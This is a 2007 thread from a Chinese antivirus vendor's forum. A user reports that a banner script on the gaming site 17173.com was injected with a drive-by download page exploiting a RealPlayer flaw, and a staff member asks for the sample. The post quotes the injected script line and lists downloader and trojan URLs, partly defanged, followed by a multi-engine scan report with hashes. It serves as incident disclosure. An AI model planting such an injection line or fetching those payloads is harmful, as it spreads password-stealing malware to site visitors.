标题:
[2007-12-03 01:14] 微点杀 17173被挂REAL漏洞的网马
[打印本页]
作者:
点饭的百度空间
时间:
2007-12-3 10:30
标题:
[2007-12-03 01:14] 微点杀 17173被挂REAL漏洞的网马
作者dikex(六翼刺猬)[url]
/*已屏蔽*/
[/url]
ICKA在群上说的:
ICKA(3831250)
(2007-12-03 00:14:54)
WOW.17173.COM
挂REAL漏洞的病毒了
/*已屏蔽*/
洗了个澡后上去看了看,挂得有点隐蔽,是在[url]
/*已屏蔽*/
[/url]这个js文件的最下面:
document.writeln("<script src=h:\/\/al.99.vc\/0.js><\/script>");
把0.js解密后看到一堆网马地址:
/*已屏蔽*/
随便找了几个来解密,发现指向的都是h://99.vc/s.exe,根据ICKA的测试,这个是个下载者之类的,会首先下载h://99.vc/ss.exe,之后ss.exe读取h://99.vc/ok.txt下载下面一堆:
h://66.186.60.195/images/1.exe
h://66.186.60.195/images/2.exe
………………
h://66.186.60.195/images/10.exe
………………
h://209.11.244.34/images/19.exe
h://209.11.244.34/images/19.exe
h://209.11.244.34/images/m1.exe
h://209.11.244.34/images/okok.exe
/*已屏蔽*/
另外值得一提的是关于那个
topBanner.js
,它其实是一个对联广告来的,在17173网站里面很多的网页上面都有,也就是17173上面许多的网页都被挂马了,而不只是
WOW.17173.COM
上面有;
浏览17173的网游玩家的数量很多,其中不乏没有打系统和某些软件补丁的人,这可让盗号的高兴了
如下图,看到这幅对联广告的页面基本上都是有毒的,各位自己小心吧。
VirSCAN.org Scanned Report :
Scanner results: 42%的杀软(15/36)报告发现病毒
File Name : ss.exe
File Size : 29218 byte
File Type : MS-DOS executable (EXE), OS/2 or MS Windows
MD5 : 4a70fbe3faf0bbf6abe68c8e1708408c
SHA1 : ddebee3a2dcd047c12a71e84c21b8e181c837576
Online report :
http://virscan.org/report/fcc5a51df31d9c7673b4cbb9e1037266.html
Scanner Engine Ver Sig Ver Sig Date Time Scan result
a-squared 3.0.0.126 2007.11.28 2007-11-28 2.85 -
安博士V3 2007.11.29.00 2007.11.29 2007-11-29 0.88 -
AntiVir 7.6.0.35 7.0.1.31 2007-11-30 2.31 TR/Autorun.BK
Arcavir 1.0.4 200711301332 2007-11-30 1.48 -
AVAST 1.0.8 071202-0 2007-12-02 3.04 Win32:AutoRun-U
AVG 7.5.49.442 269.16.10/1160 2007-11-29 1.82 -
BitDefender 7.60825.957544 7.16072 2007-12-03 3.38 Trojan.PWS.Delf.IFD
CA (VET) 9.0.0.143 31.3.5340 2007-12-01 0.76 Win32/Bancos.IHV trojan.
ClamAV 0.91.2 4975 2007-12-03 0.50 -
Comodo 2.11 2.0.0.361 2007-12-02 0.80 -
CP Secure 1.1.0.655 2007.12.02 2007-12-02 4.63 -
Dr.WEB 4.44.0.9170 2007.12.02 2007-12-02 3.29 Trojan.PWS.Qqpass.origin
ewido 4.0.0.2 2007.12.02 2007-12-02 1.85 -
F-PROT 4.4.1.52 20071130 2007-11-30 1.31 -
F-SECURE 5.51.6100 2007.11.29.09 2007-11-29 3.02 -
飞塔 2.81-3.11 8.444 2007-12-02 1.95 -
ViRobot 20071129 2007.11.29 2007-11-29 0.37 -
IKARUS T3.1.01.15 2007.11.26.69895 2007-11-26 1.26 Virus.Win32.AutoRun.u
江民杀毒 10.00.650 2007.12.02 2007-12-02 1.10 -
卡巴斯基 5.5.10 2007.12.02 2007-12-02 4.55 -
金山毒霸 2007.6.20.249 2007.12.1 2007-12-01 0.64 Win32.Troj.Snipe.f.102447
迈克菲 5.2.00 5175 2007-11-30 1.20 PWS-QQPass
MKS_VIR 2.01 2007.12.02 2007-12-02 2.39 -
NOD32 2.70.10 2697 2007-12-02 0.09 probably a variant of Win32/PSW.OnLineGames.NBR trojan
NORMAN 5.91.08 5.90 2007-11-29 3.63 W32/QQPass.GEA
熊猫卫士 9.04.03.0001 2007.12.01 2007-12-01 2.70 -
趋势 8.500-1001 4.856.43 2007-12-02 0.07 -
Prevx V2 20071202 2007-12-02 3.64 TROJAN.DOWNLOADER.GEN
QuickHeal 9.00 2007.12.01 2007-12-01 2.06 -
瑞星 19.0 20.20.62.00 2007-12-02 1.87 -
SOPHOS 2.49.1 4.21 2007-12-02 4.04 Mal/PWS-K
赛门铁克 1.3.0.24 20071202.001 2007-12-02 0.40 -
nProtect 2007-12-01.00 1074407 2007-12-01 8.05 Trojan.PWS.Delf.IFD
The Hacker 6.2.9 v00147 2007-12-01 0.72 -
VBA32 3.12.2.5 20071202.0223 2007-12-02 0.98 Trojan-PSW.Game.1 (paranoid heuristics) (suspicious)
VirusBuster 4.3.19:9 9.115.16/11.0 2007-12-01 1.31 Trojan.QQPass.Gen.4
[
Last edited by 点饭的百度空间 on 2007-12-3 at 11:02
]
作者:
Legend
时间:
2007-12-3 11:00
感谢楼主的反馈,请楼主将样本发送到我们
virus@micropoint.com.cn
邮箱,我们好及时分析解决,请随信附带此贴链接
您发送完后,请通过
论坛短消息
将您的邮箱地址发给我,也请附带此贴链接
作者:
点饭的百度空间
时间:
2007-12-3 11:01
文中已经写了 h://99.vc/ss.exe
作者:
Legend
时间:
2007-12-3 11:04
请您通过邮件向我们反馈一下,谢谢您的合作
作者:
点饭的百度空间
时间:
2007-12-3 11:04
好的
作者:
逻辑锁
时间:
2009-2-25 11:18
特来顶微点
欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)
bbs.micropoint.com.cn
